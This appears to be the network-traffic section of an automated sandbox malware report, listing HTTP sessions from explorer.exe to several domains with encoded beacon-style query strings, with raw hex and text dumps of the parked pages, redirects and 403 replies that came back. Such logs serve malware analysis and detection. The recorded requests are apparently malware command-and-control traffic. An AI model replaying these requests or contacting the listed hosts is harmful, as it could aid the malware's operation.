                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: __cfduid=d130f7d762cbd9ec6363b3087ab1aed241616573949; expires=Fri, 23-Apr-21 08:19:09 GMT; path=/; domain=.worldsourcecloud.com; HttpOnly; SameSite=Lax
                                                                              Via: 1.1 google
                                                                              CF-Cache-Status: DYNAMIC
                                                                              cf-request-id: 0904e9fe33000032be78b49000000001
                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Z1tt9also4A%2BQ8v4WM6SI%2F%2BQhZX5%2Bdho5EalrPkji7XzrEqXq0NUkngFYjnRLXlFyr7ADNLcvzMfUqlJG0ssfs4L7OdtLy2q88vHD3SButQBJI%2B7wKlsT3E%3D"}],"max_age":604800}
                                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                              Server: cloudflare
                                                                              CF-RAY: 634e79105f7832be-CDG
                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                              Data Raw: 31 31 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                              Data Ascii: 113<!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
                                                                              Mar 24, 2021 09:19:09.610826969 CET315INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              4192.168.2.54969864.190.62.11180C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 24, 2021 09:19:14.710854053 CET316OUTGET /nsag/?njndiL=9rtTFPBhfVt4&AjU=KrISVuELCs1q3UlzX6dLs0GN1f73ulMhv38PeKk8K2lo4f0Q4j/pm/FXRZPdylmCs2jx HTTP/1.1
                                                                              Host: www.icepolo.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 24, 2021 09:19:14.773067951 CET317INHTTP/1.1 200 OK
                                                                              date: Wed, 24 Mar 2021 08:19:14 GMT
                                                                              content-type: text/html; charset=UTF-8
                                                                              transfer-encoding: chunked
                                                                              vary: Accept-Encoding
                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              pragma: no-cache
                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_zzCQbQ6TQNAsp0cK7B+YyfX3jvH9cPs1HsNyNsdJoCP+ZAQ5r1dSCsd3vNs+ItK3FwTk6WsUrd3AvCBoG8QU6A==
                                                                              last-modified: Wed, 24 Mar 2021 08:19:14 GMT
                                                                              x-cache-miss-from: parking-6dfcfcdcd9-kwsfk
                                                                              server: NginX
                                                                              connection: close
                                                                              Data Raw: 32 44 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 7a 7a 43 51 62 51 36 54 51 4e 41 73 70 30 63 4b 37 42 2b 59 79 66 58 33 6a 76 48 39 63 50 73 31 48 73 4e 79 4e 73 64 4a 6f 43 50 2b 5a 41 51 35 72 31 64 53 43 73 64 33 76 4e 73 2b 49 74 4b 33 46 77 54 6b 36 57 73 55 72 64 33 41 76 43 42 6f 47 38 51 55 36 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 69 63 65 70 6f 6c 6f 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 44 69 65 73 65 20 57 65 62 73 69 74 65 20 73 74 65 68 74 20 7a 75 6d 20 56 65 72 6b 61 75 66 21 26 6e 62 73 70 3b 2d 26 6e 62 73 70 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 7a 75 6d 20 54 68 65 6d 61 20 69 63 65 70 6f 6c 6f 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 44 69 65 73 65 20 57 65 62 73 69 74 65 20 73 74 65 68 74 20 7a 75 6d 20 56 65 72 6b 61 75 66 21 20 69 63 65 70 6f 6c 6f 2e 63 6f 6d 20 69 73 74 20 64 69 65 20 62 65 73 74 65 20 51 75 65 6c 6c 65 20 66 c3 bc 72 20 61 6c 6c 65 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 64 69 65 20 53 69 65 20 73 75 63 68 65 6e 2e 20 56 6f 6e 20 61 6c 6c 67 65 6d 65 69 6e 65 6e 20 54 68 65 6d 65 6e 20 62 69 73 20 68 69 6e 20 7a 75 20 73 70 65 7a 69
                                                                              Data Ascii: 2DE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_zzCQbQ6TQNAsp0cK7B+YyfX3jvH9cPs1HsNyNsdJoCP+ZAQ5r1dSCsd3vNs+ItK3FwTk6WsUrd3AvCBoG8QU6A==><head><meta charset="utf-8"><title>icepolo.com&nbsp;-&nbspDiese Website steht zum Verkauf!&nbsp;-&nbspInformationen zum Thema icepolo.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="Diese Website steht zum Verkauf! icepolo.com ist die beste Quelle fr alle Informationen die Sie suchen. Von allgemeinen Themen bis hin zu spezi
                                                                              Mar 24, 2021 09:19:14.773112059 CET317INData Raw: 65 6c 6c 65 6e 20 53 61 63 68 76 65 72 68 61 6c 74 65 6e 2c 20 66 69 6e 64 65 6e 20 53 69 65 20 61 75 66 20 69 63 65 70 6f 6c 6f 2e 0d 0a
                                                                              Data Ascii: ellen Sachverhalten, finden Sie auf icepolo.
                                                                              Mar 24, 2021 09:19:14.773133993 CET319INData Raw: 35 36 43 0d 0a 63 6f 6d 20 61 6c 6c 65 73 2e 20 57 69 72 20 68 6f 66 66 65 6e 2c 20 64 61 73 73 20 53 69 65 20 68 69 65 72 20 64 61 73 20 47 65 73 75 63 68 74 65 20 66 69 6e 64 65 6e 21 22 3e 3c 6c 69 6e 6b 0a 20 20 20 20 20 20 20 20 72 65 6c 3d
                                                                              Data Ascii: 56Ccom alles. Wir hoffen, dass Sie hier das Gesuchte finden!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> /*! normalize.css v7.0.0 | MIT License | git
                                                                              Mar 24, 2021 09:19:14.773154020 CET319INData Raw: 3a 76 69 73 69 62 6c 65 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 62 75 74 74 6f 6e 2c 68 74 6d 6c 20 0d 0a
                                                                              Data Ascii: :visible}button,select{text-transform:none}button,html
                                                                              Mar 24, 2021 09:19:14.773164988 CET320INData Raw: 41 46 38 0d 0a 5b 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 5d 2c 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 2c 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 62 75 74 74
                                                                              Data Ascii: AF8[type="button"],[type="reset"],[type="submit"]{-webkit-appearance:button}button::-moz-focus-inner,[type="button"]::-moz-focus-inner,[type="reset"]::-moz-focus-inner,[type="submit"]::-moz-focus-inner{border-style:none;padding:0}button:-moz
                                                                              Mar 24, 2021 09:19:14.773184061 CET322INData Raw: 6c 6f 72 3a 23 37 31 37 31 37 31 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 32 35 70 78 20 61 75 74 6f 20 32 30 70 78 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 62 61 63 6b 67 72
                                                                              Data Ascii: lor:#717171}.container-content{margin:25px auto 20px auto;text-align:center;background:url("//img.sedoparking.com/templates/bg/arrows-1-colors-3.png") #FBFBFB no-repeat center top;background-size:100%}.container-content__container-relatedlinks
                                                                              Mar 24, 2021 09:19:14.773200989 CET322INData Raw: 3a 23 30 30 30 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c
                                                                              Data Ascii: :#000}.two-tier-ads-list__list-element-link{font-size:1.0em;text-decoration:underline;color:#0a48ff}.two-tier-ads-list__list-element-link
                                                                              Mar 24, 2021 09:19:14.773222923 CET323INData Raw: 41 44 32 0d 0a 3a 6c 69 6e 6b 2c 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65
                                                                              Data Ascii: AD2:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-element-link:hover,.two-tier-ads-list__list-element-link:active,.two-tier-ads-list__list-element-link:focus{text-decoration:none}.webar
                                                                              Mar 24, 2021 09:19:14.773242950 CET324INData Raw: 78 5f 5f 69 6e 70 75 74 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 62 75 74 74 6f 6e 7b 62 6f 72 64 65 72 3a 30 20 6e 6f 6e 65 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 62 75 74 74 6f 6e 7b 63
                                                                              Data Ascii: x__input,.container-searchbox__button{border:0 none}.container-searchbox__button{cursor:pointer;font-size:12px;margin-left:15px;border:0 none;padding:2px 8px;color:#638296}.container-disclaimer{text-align:center}.container-disclaimer__content{
                                                                              Mar 24, 2021 09:19:14.773262024 CET325INData Raw: 63 74 69 76 65 2d 74 65 78 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 3b 66 6f 6e 74
                                                                              Data Ascii: ctive-text{margin-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.con
                                                                              Mar 24, 2021 09:19:14.773307085 CET326INData Raw: 41 44 38 0d 0a 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 7b 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 3b 62 61 63 6b 67 72
                                                                              Data Ascii: AD8tainer-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,0.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all 0.3s;-moz-transition:all 0.3s;transition:all 0.3s;text-align:center}.cooki


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              5192.168.2.54969991.195.240.9480C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 24, 2021 09:19:19.846816063 CET337OUTGET /nsag/?AjU=nMtIT7UxRyIEAOlaE53kf7KTbdq7isGDN9MTWD/XqSMrXNBDZVXP4jiLBKn/cvoinmSm&njndiL=9rtTFPBhfVt4 HTTP/1.1
                                                                              Host: www.explorerthecity.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 24, 2021 09:19:19.882222891 CET337INHTTP/1.1 301 Moved Permanently
                                                                              content-type: text/html; charset=utf-8
                                                                              location: https://www.explorerthecity.com/nsag/?AjU=nMtIT7UxRyIEAOlaE53kf7KTbdq7isGDN9MTWD/XqSMrXNBDZVXP4jiLBKn/cvoinmSm&njndiL=9rtTFPBhfVt4
                                                                              date: Wed, 24 Mar 2021 08:19:19 GMT
                                                                              content-length: 169
                                                                              connection: close
                                                                              Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 65 78 70 6c 6f 72 65 72 74 68 65 63 69 74 79 2e 63 6f 6d 2f 6e 73 61 67 2f 3f 41 6a 55 3d 6e 4d 74 49 54 37 55 78 52 79 49 45 41 4f 6c 61 45 35 33 6b 66 37 4b 54 62 64 71 37 69 73 47 44 4e 39 4d 54 57 44 2f 58 71 53 4d 72 58 4e 42 44 5a 56 58 50 34 6a 69 4c 42 4b 6e 2f 63 76 6f 69 6e 6d 53 6d 26 61 6d 70 3b 6e 6a 6e 64 69 4c 3d 39 72 74 54 46 50 42 68 66 56 74 34 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a
                                                                              Data Ascii: <a href="https://www.explorerthecity.com/nsag/?AjU=nMtIT7UxRyIEAOlaE53kf7KTbdq7isGDN9MTWD/XqSMrXNBDZVXP4jiLBKn/cvoinmSm&amp;njndiL=9rtTFPBhfVt4">Moved Permanently</a>.


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              6192.168.2.54970034.102.136.18080C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 24, 2021 09:19:24.957638025 CET338OUTGET /nsag/?njndiL=9rtTFPBhfVt4&AjU=Zdd+03lFPdaO8MwVGmYqRiw2DY9Wd51jzurMe9uohGYtv5+xzmK27QiPS7vk8ejd2SQP HTTP/1.1
                                                                              Host: www.winabeel.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 24, 2021 09:19:25.074450016 CET339INHTTP/1.1 403 Forbidden
                                                                              Server: openresty
                                                                              Date: Wed, 24 Mar 2021 08:19:25 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 275
                                                                              ETag: "605504c2-113"
                                                                              Via: 1.1 google
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              7192.168.2.549701188.164.131.20080C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 24, 2021 09:19:30.148121119 CET340OUTGET /nsag/?AjU=nc5cR7fY8cj1BazpizuRFZBRA29btuqKtt0gl+AxZx4jZyN4s2dbmE6wVRrG6oTnsIdd&njndiL=9rtTFPBhfVt4 HTTP/1.1
                                                                              Host: www.alpinevalleytimeshares.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 24, 2021 09:19:30.164272070 CET340INHTTP/1.1 302 Moved Temporarily
                                                                              Server: nginx
                                                                              Date: Wed, 24 Mar 2021 08:19:30 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 154
                                                                              Connection: close
                                                                              Location: http://www.alpinevalleytimeshares.com?AjU=nc5cR7fY8cj1BazpizuRFZBRA29btuqKtt0gl+AxZx4jZyN4s2dbmE6wVRrG6oTnsIdd&njndiL=9rtTFPBhfVt4
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              8192.168.2.549702199.59.242.15380C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 24, 2021 09:19:35.425997019 CET341OUTGET /nsag/?njndiL=9rtTFPBhfVt4&AjU=hPHybZPTt185zNO3xz6D1Y5bPXZXETq0TTvyEiyuX6EjGbgQmrQNvgkWI3CJg50tk2Lo HTTP/1.1
                                                                              Host: www.krishnagiri.info
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 24, 2021 09:19:35.534957886 CET343INHTTP/1.1 200 OK
                                                                              Server: openresty
                                                                              Date: Wed, 24 Mar 2021 08:19:35 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_riZFt0YeAlLzrJrJqmfzSyYei01eC6BahxWA0DGp6onZ3cpw9tH6jB1dYaKPbcWzpjElZV23WgxJkpeeXKY/xw==
                                                                              Data Raw: 65 65 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 69 5a 46 74 30 59 65 41 6c 4c 7a 72 4a 72 4a 71 6d 66 7a 53 79 59 65 69 30 31 65 43 36 42 61 68 78 57 41 30 44 47 70 36 6f 6e 5a 33 63 70 77 39 74 48 36 6a 42 31 64 59 61 4b 50 62 63 57 7a 70 6a 45 6c 5a 56 32 33 57 67 78 4a 6b 70 65 65 58 4b 59 2f 78 77 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 65 20 72 65 6c 61 74 65 64 20 6c 69 6e 6b 73 20 74 6f 20 77 68 61 74 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e 22 2f 3e 3c 2f 68 65 61 64 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 36 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 36 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 37 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 37 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 38 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 49 45 20 39 20 5d 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 21 2d 2d 5b 69 66 20 28 67 74 20 49 45 20 39 29 7c 21 28 49 45 29 5d 3e 20 2d 2d 3e 3c 62 6f 64 79 3e 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 67 5f 70 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 0a 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 61 7a 78 3d 6c 6f 63 61 74 69 6f 6e 2c 44 44 3d 44 54 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 2c 61 41 43 3d 66 61 6c 73 65 2c 4c 55 3b 44 44 2e 64 65 66 65 72 3d 74 72 75 65 3b 44 44 2e 61 73 79 6e 63 3d 74 72 75 65 3b 44 44 2e 73 72 63 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 22 3b 44 44 2e 6f 6e 65
                                                                              Data Ascii: ee4<!DOCTYPE html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_riZFt0YeAlLzrJrJqmfzSyYei01eC6BahxWA0DGp6onZ3cpw9tH6jB1dYaKPbcWzpjElZV23WgxJkpeeXKY/xw=="><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title></title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="description" content="See related links to what you are looking for."/></head>...[if IE 6 ]><body class="ie6"><![endif]-->...[if IE 7 ]><body class="ie7"><![endif]-->...[if IE 8 ]><body class="ie8"><![endif]-->...[if IE 9 ]><body class="ie9"><![endif]-->...[if (gt IE 9)|!(IE)]> --><body>...<![endif]--><script type="text/javascript">g_pb=(function(){varDT=document,azx=location,DD=DT.createElement('script'),aAC=false,LU;DD.defer=true;DD.async=true;DD.src="//www.google.com/adsense/domains/caf.js";DD.one
                                                                              Mar 24, 2021 09:19:35.534975052 CET344INData Raw: 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 61 7a 78 2e 73 65 61 72 63 68 21 3d 3d 27 3f 7a 27 29 7b 61 7a 78 2e 68 72 65 66 3d 27 2f 3f 7a 27 3b 7d 7d 3b 44 44 2e 6f 6e 6c 6f 61 64 3d 44 44 2e 6f 6e 72 65 61 64 79 73 74 61 74 65 63
                                                                              Data Ascii: rror=function(){if(azx.search!=='?z'){azx.href='/?z';}};DD.onload=DD.onreadystatechange=function(){if(!aAC&&LU){if(!window['googleNDT_']){}LU(google.ads.domains.Caf);}aAC=true;};DT.body.appendChild(DD);return{azm:function(n$){if(aAC)n$(goog
                                                                              Mar 24, 2021 09:19:35.534991026 CET345INData Raw: 2c 52 72 3d 77 69 6e 64 6f 77 2c 61 7a 78 3d 52 72 2e 6c 6f 63 61 74 69 6f 6e 2c 61 41 42 3d 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2c 44 54 3d 64 6f 63 75 6d 65 6e 74 2c 53 66 3d 44 54 2e 62 6f 64 79 7c 7c 44 54 2e 67 65 74 45 6c 65 6d 65 6e 74 73
                                                                              Data Ascii: ,Rr=window,azx=Rr.location,aAB=top.location,DT=document,Sf=DT.body||DT.getElementsByTagName('body')[0],aAy=0,aAx=0,aAz=0,$IE=null;if(Sf.className==='ie6')$IE=6;else if(Sf.className==='ie7')$IE=7;else if(Sf.className==='ie8')$IE=8;else if(Sf
